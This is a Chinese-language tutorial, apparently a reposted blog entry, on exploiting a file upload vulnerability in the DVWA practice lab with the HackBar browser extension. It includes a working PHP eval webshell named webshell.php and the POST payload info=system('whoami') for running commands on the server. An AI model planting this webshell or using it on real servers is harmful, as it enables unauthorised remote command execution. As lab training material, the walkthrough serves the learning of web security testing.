当前位置: 首页 > news >正文

文件上传漏洞-HackBar使用

介绍

HackBar 是一个用于浏览器的扩展插件,主要用于进行网络渗透测试和安全评估。它提供了一系列方便的工具和功能,可以帮助用户执行各种网络攻击和测试,包括 XSS、SQL 注入、CSRF、路径穿越等

下载地址

可以到github上面去下载,我这边是https://github.com/Mr-xn/hackbar2.1.3 这个下载的

Google浏览器安装插件

打开Google浏览器->设置->扩展程序->管理扩展程序。这里需要开发开发者模式。

直接将HackBar-v2.3.1.zip拖入浏览器就行

HackBar使用

1、继续将我们的DVWA安全等级设置成lower

2、编写PHP注册代码文件

这里PHP的版本不一样,我们写的内容也有差异,我这里PHP是7.3.x 。我们这边将文件名字命名为webshell.php

<?php 
$name=$_POST["info"];//接收POST请求的入参 
if(empty($name)){ 
$name=phpinfo();//如果没有传入值,默认给phpinfo() 
} 
eval("\$name1= $name;");//执行$name命名的将返回的结果赋值给$name1。 
?>

3、上传webshell.php文件

我们在File Upload地方上传webshell.php文件

4、访问上传的webshell.php文件

我们通过浏览器访问上传的webshell.php文件可以看到默认打印了php的版本信息

5、使用HackBar进行操作

这里我们通过开发者模式调出HackBar插件。

  1. 先load URL 将需要访问的URL加载一下
  2. 选择Post data方式
  3. 在代码框里面编写执行代码,这里我们写入info=system('whoami')。意思就是将system('whoami')这个值赋值给webshell里面的info。
  4. 点击Execute
  5. 我们就可以看到浏览器里面打印出用户的信息
  6. 我们在输入其他的都可以打印出来,这里就不详细操作。

http://www.lryc.cn/news/415036.html

相关文章:

  • 鸿蒙媒体开发【相机数据采集保存】音频和视频
  • 【java基础】徒手写Hello, World!程序
  • 对 vllm 与 ollama 的一些研究
  • 浅谈基础的图算法——强联通分量算法(c++)
  • C#:通用方法总结—第13集
  • AI答题应用平台相关面试题
  • 树莓派NAS系统搭建教程:使用Flask和SQLite实现HTTP/HTTPS文件管理(代码示例)
  • mysql如何储存大量数据,分库存分表的建议和看法
  • Golang | Leetcode Golang题解之第310题最小高度树
  • 【面试系列】软件架构师 高频面试题及详细解答
  • 二百五十四、OceanBase——Linux上安装OceanBase数据库(四):登录ocp-express,配置租户管理等信息
  • HCIP学习作业一 | HCIA复习
  • OCR图片矫正、表格检测及裁剪综合实践
  • c++ 容器 vector
  • 零基础部署Minecraft到云服务器上教程
  • 常见cms漏洞之dedecms
  • 深入探究Liunx服务器内存:模拟程序实际占用与缓存占用内存
  • 《Milvus Cloud向量数据库指南》——Zilliz Cloud 高可用性深度解析:赋能GenAI应用,引领非结构化数据新纪元
  • 2024/8/4 维高-STD60N驱动器(伺服)---客户反馈:电机异响
  • 驾驭RESTful海洋:在PyCharm中配置和使用REST客户端全攻略
  • 策略模式的一次应用
  • 探索PyCharm的C/C++支持:一站式配置指南
  • 手机三要素接口怎么对接呢?(一)
  • 状态同步帧同步
  • Flink 开发语言选择 —— Java vs Scala
  • 如何在 Apache Web 服务器中安装、配置和使用模块
  • 海信聚好看的DBDocter软件使用心得
  • dfs深搜
  • 【React】详解 index.js 文件
  • Android NDK/JNI面试题大全及参考答案(3万字长文)